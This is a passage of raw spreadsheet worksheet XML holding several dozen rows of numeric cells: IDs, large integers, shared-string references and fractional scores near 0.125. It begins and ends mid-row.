      <c r="A6085" s="1">
        <v>22117.0</v>
      </c>
      <c r="B6085" s="2">
        <v>3.0979947E7</v>
      </c>
      <c r="C6085" s="2" t="s">
        <v>5799</v>
      </c>
      <c r="D6085" s="2">
        <v>1.0</v>
      </c>
      <c r="E6085" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6085" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6086" ht="15.75" customHeight="1">
      <c r="A6086" s="1">
        <v>22296.0</v>
      </c>
      <c r="B6086" s="2">
        <v>3.3537842E7</v>
      </c>
      <c r="C6086" s="2" t="s">
        <v>5800</v>
      </c>
      <c r="D6086" s="2">
        <v>1.0</v>
      </c>
      <c r="E6086" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6086" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6087" ht="15.75" customHeight="1">
      <c r="A6087" s="1">
        <v>22702.0</v>
      </c>
      <c r="B6087" s="2">
        <v>4254877.0</v>
      </c>
      <c r="C6087" s="2" t="s">
        <v>5801</v>
      </c>
      <c r="D6087" s="2">
        <v>1.0</v>
      </c>
      <c r="E6087" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6087" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6088" ht="15.75" customHeight="1">
      <c r="A6088" s="1">
        <v>22708.0</v>
      </c>
      <c r="B6088" s="2">
        <v>4.2969986E7</v>
      </c>
      <c r="C6088" s="2" t="s">
        <v>5802</v>
      </c>
      <c r="D6088" s="2">
        <v>1.0</v>
      </c>
      <c r="E6088" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6088" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6089" ht="15.75" customHeight="1">
      <c r="A6089" s="1">
        <v>25823.0</v>
      </c>
      <c r="B6089" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C6089" s="2" t="s">
        <v>5803</v>
      </c>
      <c r="D6089" s="2">
        <v>1.0</v>
      </c>
      <c r="E6089" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6089" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6090" ht="15.75" customHeight="1">
      <c r="A6090" s="1">
        <v>26643.0</v>
      </c>
      <c r="B6090" s="2">
        <v>1.8048254E7</v>
      </c>
      <c r="C6090" s="2" t="s">
        <v>5804</v>
      </c>
      <c r="D6090" s="2">
        <v>1.0</v>
      </c>
      <c r="E6090" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6090" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6091" ht="15.75" customHeight="1">
      <c r="A6091" s="1">
        <v>26714.0</v>
      </c>
      <c r="B6091" s="2">
        <v>1.8223276E7</v>
      </c>
      <c r="C6091" s="2" t="s">
        <v>5805</v>
      </c>
      <c r="D6091" s="2">
        <v>1.0</v>
      </c>
      <c r="E6091" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6091" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6092" ht="15.75" customHeight="1">
      <c r="A6092" s="1">
        <v>26807.0</v>
      </c>
      <c r="B6092" s="2">
        <v>1.870692E7</v>
      </c>
      <c r="C6092" s="2" t="s">
        <v>5806</v>
      </c>
      <c r="D6092" s="2">
        <v>1.0</v>
      </c>
      <c r="E6092" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6092" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6093" ht="15.75" customHeight="1">
      <c r="A6093" s="1">
        <v>27120.0</v>
      </c>
      <c r="B6093" s="2">
        <v>2.0660226E7</v>
      </c>
      <c r="C6093" s="2" t="s">
        <v>5807</v>
      </c>
      <c r="D6093" s="2">
        <v>1.0</v>
      </c>
      <c r="E6093" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6093" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6094" ht="15.75" customHeight="1">
      <c r="A6094" s="1">
        <v>27539.0</v>
      </c>
      <c r="B6094" s="2">
        <v>2.221668E7</v>
      </c>
      <c r="C6094" s="2" t="s">
        <v>5808</v>
      </c>
      <c r="D6094" s="2">
        <v>1.0</v>
      </c>
      <c r="E6094" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6094" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6095" ht="15.75" customHeight="1">
      <c r="A6095" s="1">
        <v>27734.0</v>
      </c>
      <c r="B6095" s="2">
        <v>2.3080381E7</v>
      </c>
      <c r="C6095" s="2" t="s">
        <v>5809</v>
      </c>
      <c r="D6095" s="2">
        <v>1.0</v>
      </c>
      <c r="E6095" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6095" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6096" ht="15.75" customHeight="1">
      <c r="A6096" s="1">
        <v>27812.0</v>
      </c>
      <c r="B6096" s="2">
        <v>2.3313066E7</v>
      </c>
      <c r="C6096" s="2" t="s">
        <v>5810</v>
      </c>
      <c r="D6096" s="2">
        <v>1.0</v>
      </c>
      <c r="E6096" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6096" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6097" ht="15.75" customHeight="1">
      <c r="A6097" s="1">
        <v>27833.0</v>
      </c>
      <c r="B6097" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C6097" s="2" t="s">
        <v>5811</v>
      </c>
      <c r="D6097" s="2">
        <v>1.0</v>
      </c>
      <c r="E6097" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6097" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6098" ht="15.75" customHeight="1">
      <c r="A6098" s="1">
        <v>29110.0</v>
      </c>
      <c r="B6098" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C6098" s="2" t="s">
        <v>5812</v>
      </c>
      <c r="D6098" s="2">
        <v>1.0</v>
      </c>
      <c r="E6098" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6098" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6099" ht="15.75" customHeight="1">
      <c r="A6099" s="1">
        <v>29557.0</v>
      </c>
      <c r="B6099" s="2">
        <v>3.3153889E7</v>
      </c>
      <c r="C6099" s="2" t="s">
        <v>5813</v>
      </c>
      <c r="D6099" s="2">
        <v>1.0</v>
      </c>
      <c r="E6099" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6099" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6100" ht="15.75" customHeight="1">
      <c r="A6100" s="1">
        <v>29699.0</v>
      </c>
      <c r="B6100" s="2">
        <v>3.4329754E7</v>
      </c>
      <c r="C6100" s="2" t="s">
        <v>5814</v>
      </c>
      <c r="D6100" s="2">
        <v>1.0</v>
      </c>
      <c r="E6100" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6100" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6101" ht="15.75" customHeight="1">
      <c r="A6101" s="1">
        <v>30137.0</v>
      </c>
      <c r="B6101" s="2">
        <v>3.703616E7</v>
      </c>
      <c r="C6101" s="2" t="s">
        <v>5815</v>
      </c>
      <c r="D6101" s="2">
        <v>1.0</v>
      </c>
      <c r="E6101" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6101" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6102" ht="15.75" customHeight="1">
      <c r="A6102" s="1">
        <v>30215.0</v>
      </c>
      <c r="B6102" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C6102" s="2" t="s">
        <v>5816</v>
      </c>
      <c r="D6102" s="2">
        <v>1.0</v>
      </c>
      <c r="E6102" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6102" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6103" ht="15.75" customHeight="1">
      <c r="A6103" s="1">
        <v>30689.0</v>
      </c>
      <c r="B6103" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C6103" s="2" t="s">
        <v>5801</v>
      </c>
      <c r="D6103" s="2">
        <v>1.0</v>
      </c>
      <c r="E6103" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6103" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6104" ht="15.75" customHeight="1">
      <c r="A6104" s="1">
        <v>30709.0</v>
      </c>
      <c r="B6104" s="2">
        <v>4.2969985E7</v>
      </c>
      <c r="C6104" s="2" t="s">
        <v>5802</v>
      </c>
      <c r="D6104" s="2">
        <v>1.0</v>
      </c>
      <c r="E6104" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6104" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6105" ht="15.75" customHeight="1">
      <c r="A6105" s="1">
        <v>30842.0</v>
      </c>
      <c r="B6105" s="2">
        <v>4.58133E7</v>
      </c>
      <c r="C6105" s="2" t="s">
        <v>5817</v>
      </c>
      <c r="D6105" s="2">
        <v>1.0</v>
      </c>
      <c r="E6105" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6105" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6106" ht="15.75" customHeight="1">
      <c r="A6106" s="1">
        <v>31043.0</v>
      </c>
      <c r="B6106" s="2">
        <v>4.7884823E7</v>
      </c>
      <c r="C6106" s="2" t="s">
        <v>5818</v>
      </c>
      <c r="D6106" s="2">
        <v>1.0</v>
      </c>
      <c r="E6106" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6106" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6107" ht="15.75" customHeight="1">
      <c r="A6107" s="1">
        <v>31303.0</v>
      </c>
      <c r="B6107" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C6107" s="2" t="s">
        <v>5819</v>
      </c>
      <c r="D6107" s="2">
        <v>1.0</v>
      </c>
      <c r="E6107" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6107" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6108" ht="15.75" customHeight="1">
      <c r="A6108" s="1">
        <v>31548.0</v>
      </c>
      <c r="B6108" s="2">
        <v>5.1136124E7</v>
      </c>
      <c r="C6108" s="2" t="s">
        <v>5820</v>
      </c>
      <c r="D6108" s="2">
        <v>1.0</v>
      </c>
      <c r="E6108" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6108" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6109" ht="15.75" customHeight="1">
      <c r="A6109" s="1">
        <v>31884.0</v>
      </c>
      <c r="B6109" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C6109" s="2" t="s">
        <v>5821</v>
      </c>
      <c r="D6109" s="2">
        <v>1.0</v>
      </c>
      <c r="E6109" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6109" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6110" ht="15.75" customHeight="1">
      <c r="A6110" s="1">
        <v>31988.0</v>
      </c>
      <c r="B6110" s="2">
        <v>5328817.0</v>
      </c>
      <c r="C6110" s="2" t="s">
        <v>5822</v>
      </c>
      <c r="D6110" s="2">
        <v>1.0</v>
      </c>
      <c r="E6110" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6110" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6111" ht="15.75" customHeight="1">
      <c r="A6111" s="1">
        <v>32147.0</v>
      </c>
      <c r="B6111" s="2">
        <v>5.4237286E7</v>
      </c>
      <c r="C6111" s="2" t="s">
        <v>5823</v>
      </c>
      <c r="D6111" s="2">
        <v>1.0</v>
      </c>
      <c r="E6111" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6111" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6112" ht="15.75" customHeight="1">
      <c r="A6112" s="1">
        <v>32787.0</v>
      </c>
      <c r="B6112" s="2">
        <v>6138368.0</v>
      </c>
      <c r="C6112" s="2" t="s">
        <v>5824</v>
      </c>
      <c r="D6112" s="2">
        <v>1.0</v>
      </c>
      <c r="E6112" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6112" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6113" ht="15.75" customHeight="1">
      <c r="A6113" s="1">
        <v>33301.0</v>
      </c>
      <c r="B6113" s="2">
        <v>7491061.0</v>
      </c>
      <c r="C6113" s="2" t="s">
        <v>5825</v>
      </c>
      <c r="D6113" s="2">
        <v>1.0</v>
      </c>
      <c r="E6113" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6113" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6114" ht="15.75" customHeight="1">
      <c r="A6114" s="1">
        <v>33476.0</v>
      </c>
      <c r="B6114" s="2">
        <v>7986414.0</v>
      </c>
      <c r="C6114" s="2" t="s">
        <v>5826</v>
      </c>
      <c r="D6114" s="2">
        <v>1.0</v>
      </c>
      <c r="E6114" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6114" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6115" ht="15.75" customHeight="1">
      <c r="A6115" s="1">
        <v>33711.0</v>
      </c>
      <c r="B6115" s="2">
        <v>8491301.0</v>
      </c>
      <c r="C6115" s="2" t="s">
        <v>5827</v>
      </c>
      <c r="D6115" s="2">
        <v>1.0</v>
      </c>
      <c r="E6115" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6115" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6116" ht="15.75" customHeight="1">
      <c r="A6116" s="1">
        <v>33746.0</v>
      </c>
      <c r="B6116" s="2">
        <v>8568755.0</v>
      </c>
      <c r="C6116" s="2" t="s">
        <v>5828</v>
      </c>
      <c r="D6116" s="2">
        <v>1.0</v>
      </c>
      <c r="E6116" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6116" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6117" ht="15.75" customHeight="1">
      <c r="A6117" s="1">
        <v>33835.0</v>
      </c>
      <c r="B6117" s="2">
        <v>8993618.0</v>
      </c>
      <c r="C6117" s="2" t="s">
        <v>5829</v>
      </c>
      <c r="D6117" s="2">
        <v>1.0</v>
      </c>
      <c r="E6117" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6117" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6118" ht="15.75" customHeight="1">
      <c r="A6118" s="1">
        <v>33892.0</v>
      </c>
      <c r="B6118" s="2">
        <v>9185895.0</v>
      </c>
      <c r="C6118" s="2" t="s">
        <v>5830</v>
      </c>
      <c r="D6118" s="2">
        <v>1.0</v>
      </c>
      <c r="E6118" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6118" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="6119" ht="15.75" customHeight="1">
      <c r="A6119" s="1">
        <v>18648.0</v>
      </c>
      <c r="B6119" s="2">
        <v>5.3454112E7</v>
      </c>
      <c r="C6119" s="2" t="s">
        <v>5831</v>
      </c>
      <c r="D6119" s="2">
        <v>1.0</v>
      </c>
      <c r="E6119" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6119" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6120" ht="15.75" customHeight="1">
      <c r="A6120" s="1">
        <v>22925.0</v>
      </c>
      <c r="B6120" s="2">
        <v>4.8505826E7</v>
      </c>
      <c r="C6120" s="2" t="s">
        <v>5832</v>
      </c>
      <c r="D6120" s="2">
        <v>1.0</v>
      </c>
      <c r="E6120" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6120" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6121" ht="15.75" customHeight="1">
      <c r="A6121" s="1">
        <v>24824.0</v>
      </c>
      <c r="B6121" s="2">
        <v>1.2098566E7</v>
      </c>
      <c r="C6121" s="2" t="s">
        <v>5833</v>
      </c>
      <c r="D6121" s="2">
        <v>1.0</v>
      </c>
      <c r="E6121" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6121" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6122" ht="15.75" customHeight="1">
      <c r="A6122" s="1">
        <v>29607.0</v>
      </c>
      <c r="B6122" s="2">
        <v>3.3580844E7</v>
      </c>
      <c r="C6122" s="2" t="s">
        <v>5834</v>
      </c>
      <c r="D6122" s="2">
        <v>1.0</v>
      </c>
      <c r="E6122" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6122" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6123" ht="15.75" customHeight="1">
      <c r="A6123" s="1">
        <v>31109.0</v>
      </c>
      <c r="B6123" s="2">
        <v>4.8674731E7</v>
      </c>
      <c r="C6123" s="2" t="s">
        <v>5835</v>
      </c>
      <c r="D6123" s="2">
        <v>1.0</v>
      </c>
      <c r="E6123" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6123" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6124" ht="15.75" customHeight="1">
      <c r="A6124" s="1">
        <v>32785.0</v>
      </c>
      <c r="B6124" s="2">
        <v>6138368.0</v>
      </c>
      <c r="C6124" s="2" t="s">
        <v>5836</v>
      </c>
      <c r="D6124" s="2">
        <v>1.0</v>
      </c>
      <c r="E6124" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6124" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="6125" ht="15.75" customHeight="1">
      <c r="A6125" s="1">
        <v>24473.0</v>
      </c>
      <c r="B6125" s="2">
        <v>1.1010751E7</v>
      </c>
      <c r="C6125" s="2" t="s">
        <v>5837</v>
      </c>
      <c r="D6125" s="2">
        <v>1.0</v>
      </c>
      <c r="E6125" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6125" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="6126" ht="15.75" customHeight="1">
      <c r="A6126" s="1">
        <v>25586.0</v>
      </c>
      <c r="B6126" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C6126" s="2" t="s">
        <v>5838</v>
      </c>
      <c r="D6126" s="2">
        <v>1.0</v>
      </c>
      <c r="E6126" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6126" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="6127" ht="15.75" customHeight="1">
      <c r="A6127" s="1">
        <v>25911.0</v>
      </c>
      <c r="B6127" s="2">
        <v>1.5087773E7</v>
      </c>
      <c r="C6127" s="2" t="s">
        <v>5839</v>
      </c>
      <c r="D6127" s="2">
        <v>1.0</v>
      </c>
      <c r="E6127" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6127" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="6128" ht="15.75" customHeight="1">
      <c r="A6128" s="1">
        <v>28555.0</v>
      </c>
      <c r="B6128" s="2">
        <v>2.6874665E7</v>
      </c>
      <c r="C6128" s="2" t="s">
        <v>5840</v>
      </c>
      <c r="D6128" s="2">
        <v>1.0</v>
      </c>
      <c r="E6128" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6128" s="2">
        <v>0.1252354048964219</v>
      </c>
    </row>
    <row r="6129" ht="15.75" customHeight="1">
      <c r="A6129" s="1">
        <v>31790.0</v>
      </c>
      <c r="B6129" s="2">
        <v>5234975.0</v>
      </c>
      <c r="C6129" s="2" t="s">
        <v>5841</v>
      </c>
      <c r="D6129" s="2">
        <v>1.0</v>
      </c>
      <c r="E6129" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6129" s="2">
        <v>0.1252354048964219</v>
      </c>
    </row>
    <row r="6130" ht="15.75" customHeight="1">
      <c r="A6130" s="1">
        <v>15140.0</v>
      </c>
      <c r="B6130" s="2">
        <v>4.1925922E7</v>
      </c>
      <c r="C6130" s="2" t="s">
        <v>5842</v>
      </c>
      <c r="D6130" s="2">
        <v>1.0</v>
      </c>
      <c r="E6130" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6130" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="6131" ht="15.75" customHeight="1">
      <c r="A6131" s="1">
        <v>23924.0</v>
      </c>
      <c r="B6131" s="2">
        <v>8578599.0</v>
      </c>
      <c r="C6131" s="2" t="s">
        <v>5843</v>
      </c>
      <c r="D6131" s="2">
        <v>1.0</v>
      </c>
      <c r="E6131" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6131" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="6132" ht="15.75" customHeight="1">
      <c r="A6132" s="1">
        <v>24890.0</v>
      </c>
      <c r="B6132" s="2">
        <v>1.2255915E7</v>
      </c>
      <c r="C6132" s="2" t="s">
        <v>5844</v>
      </c>
      <c r="D6132" s="2">
        <v>1.0</v>
      </c>
      <c r="E6132" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6132" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="6133" ht="15.75" customHeight="1">
      <c r="A6133" s="1">
        <v>26868.0</v>
      </c>
      <c r="B6133" s="2">
        <v>1.9084237E7</v>
      </c>
      <c r="C6133" s="2" t="s">
        <v>5845</v>
      </c>
      <c r="D6133" s="2">
        <v>1.0</v>
      </c>
      <c r="E6133" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6133" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="6134" ht="15.75" customHeight="1">
      <c r="A6134" s="1">
        <v>33552.0</v>
      </c>
      <c r="B6134" s="2">
        <v>8193850.0</v>
      </c>
      <c r="C6134" s="2" t="s">
        <v>5846</v>
      </c>
      <c r="D6134" s="2">
        <v>1.0</v>
      </c>
      <c r="E6134" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6134" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="6135" ht="15.75" customHeight="1">
      <c r="A6135" s="1">
        <v>24305.0</v>
      </c>
      <c r="B6135" s="2">
        <v>1.0579638E7</v>
      </c>
      <c r="C6135" s="2" t="s">
        <v>5847</v>
      </c>
      <c r="D6135" s="2">
        <v>1.0</v>
      </c>
      <c r="E6135" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6135" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="6136" ht="15.75" customHeight="1">
      <c r="A6136" s="1">
        <v>26859.0</v>
      </c>
      <c r="B6136" s="2">
        <v>1.9029553E7</v>
      </c>
      <c r="C6136" s="2" t="s">
        <v>5848</v>
      </c>
      <c r="D6136" s="2">
        <v>1.0</v>
      </c>
      <c r="E6136" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6136" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="6137" ht="15.75" customHeight="1">
      <c r="A6137" s="1">
        <v>33799.0</v>
      </c>
      <c r="B6137" s="2">
        <v>8805834.0</v>
      </c>
      <c r="C6137" s="2" t="s">
        <v>5849</v>
      </c>
      <c r="D6137" s="2">
        <v>1.0</v>
      </c>
      <c r="E6137" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6137" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="6138" ht="15.75" customHeight="1">
      <c r="A6138" s="1">
        <v>1705.0</v>
      </c>
      <c r="B6138" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C6138" s="2" t="s">
        <v>5850</v>
      </c>
      <c r="D6138" s="2">
        <v>1.0</v>
      </c>
      <c r="E6138" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6138" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="6139" ht="15.75" customHeight="1">
      <c r="A6139" s="1">
        <v>33791.0</v>
      </c>
      <c r="B6139" s="2">
        <v>8764298.0</v>
      </c>
      <c r="C6139" s="2" t="s">
        <v>5851</v>
      </c>
      <c r="D6139" s="2">
        <v>1.0</v>
      </c>
      <c r="E6139" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6139" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="6140" ht="15.75" customHeight="1">
      <c r="A6140" s="1">
        <v>22163.0</v>
      </c>
      <c r="B6140" s="2">
        <v>3.1457445E7</v>
      </c>
      <c r="C6140" s="2" t="s">
        <v>5852</v>
      </c>
      <c r="D6140" s="2">
        <v>1.0</v>
      </c>
      <c r="E6140" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6140" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="6141" ht="15.75" customHeight="1">
      <c r="A6141" s="1">
        <v>32891.0</v>
      </c>
      <c r="B6141" s="2">
        <v>6376162.0</v>
      </c>
      <c r="C6141" s="2" t="s">
        <v>5853</v>
      </c>
      <c r="D6141" s="2">
        <v>1.0</v>
      </c>
      <c r="E6141" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6141" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="6142" ht="15.75" customHeight="1">
      <c r="A6142" s="1">
        <v>24314.0</v>
      </c>
      <c r="B6142" s="2">
        <v>1.0602383E7</v>
      </c>
      <c r="C6142" s="2" t="s">
        <v>5854</v>
      </c>
      <c r="D6142" s="2">
        <v>1.0</v>
      </c>
      <c r="E6142" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6142" s="2">
        <v>0.1246438746438747</v>
      </c>
    </row>
    <row r="6143" ht="15.75" customHeight="1">
      <c r="A6143" s="1">
        <v>27786.0</v>
      </c>
      <c r="B6143" s="2">
        <v>2.3128341E7</v>
      </c>
      <c r="C6143" s="2" t="s">
        <v>5691</v>
      </c>
      <c r="D6143" s="2">
        <v>1.0</v>
      </c>
      <c r="E6143" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6143" s="2">
        <v>0.1246031746031746</v>
      </c>
    </row>
    <row r="6144" ht="15.75" customHeight="1">
      <c r="A6144" s="1">
        <v>21611.0</v>
      </c>
      <c r="B6144" s="2">
        <v>2.4473044E7</v>
      </c>
      <c r="C6144" s="2" t="s">
        <v>5855</v>
      </c>
      <c r="D6144" s="2">
        <v>1.0</v>
      </c>
      <c r="E6144" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6144" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="6145" ht="15.75" customHeight="1">
      <c r="A6145" s="1">
        <v>28037.0</v>
      </c>
      <c r="B6145" s="2">
        <v>2.4473043E7</v>
      </c>
      <c r="C6145" s="2" t="s">
        <v>5855</v>
      </c>
      <c r="D6145" s="2">
        <v>1.0</v>
      </c>
      <c r="E6145" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6145" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="6146" ht="15.75" customHeight="1">
      <c r="A6146" s="1">
        <v>13020.0</v>
      </c>
      <c r="B6146" s="2">
        <v>3.2937738E7</v>
      </c>
      <c r="C6146" s="2" t="s">
        <v>5856</v>
      </c>
      <c r="D6146" s="2">
        <v>1.0</v>
      </c>
      <c r="E6146" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6146" s="2">
        <v>0.1244131455399061</v>
      </c>
    </row>
    <row r="6147" ht="15.75" customHeight="1">
      <c r="A6147" s="1">
        <v>28760.0</v>
      </c>
      <c r="B6147" s="2">
        <v>2.8166341E7</v>
      </c>
      <c r="C6147" s="2" t="s">
        <v>5857</v>
      </c>
      <c r="D6147" s="2">
        <v>1.0</v>
      </c>
      <c r="E6147" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6147" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="6148" ht="15.75" customHeight="1">
      <c r="A6148" s="1">
        <v>29299.0</v>
      </c>
      <c r="B6148" s="2">
        <v>3.121946E7</v>
      </c>
      <c r="C6148" s="2" t="s">
        <v>5858</v>
      </c>
      <c r="D6148" s="2">
        <v>1.0</v>
      </c>
      <c r="E6148" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6148" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="6149" ht="15.75" customHeight="1">
      <c r="A6149" s="1">
        <v>25530.0</v>
      </c>
      <c r="B6149" s="2">
        <v>1.4222297E7</v>
      </c>
      <c r="C6149" s="2" t="s">
        <v>5859</v>
      </c>
      <c r="D6149" s="2">
        <v>1.0</v>
      </c>
      <c r="E6149" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6149" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="6150" ht="15.75" customHeight="1">
      <c r="A6150" s="1">
        <v>7209.0</v>
      </c>
      <c r="B6150" s="2">
        <v>5.0597945E7</v>
      </c>
      <c r="C6150" s="2" t="s">
        <v>5860</v>
      </c>
      <c r="D6150" s="2">
        <v>1.0</v>
      </c>
      <c r="E6150" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6150" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="6151" ht="15.75" customHeight="1">
      <c r="A6151" s="1">
        <v>22396.0</v>
      </c>
      <c r="B6151" s="2">
        <v>3.5475521E7</v>
      </c>
      <c r="C6151" s="2" t="s">
        <v>5861</v>
      </c>
      <c r="D6151" s="2">
        <v>1.0</v>
      </c>
      <c r="E6151" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6151" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="6152" ht="15.75" customHeight="1">
      <c r="A6152" s="1">
        <v>25335.0</v>
      </c>
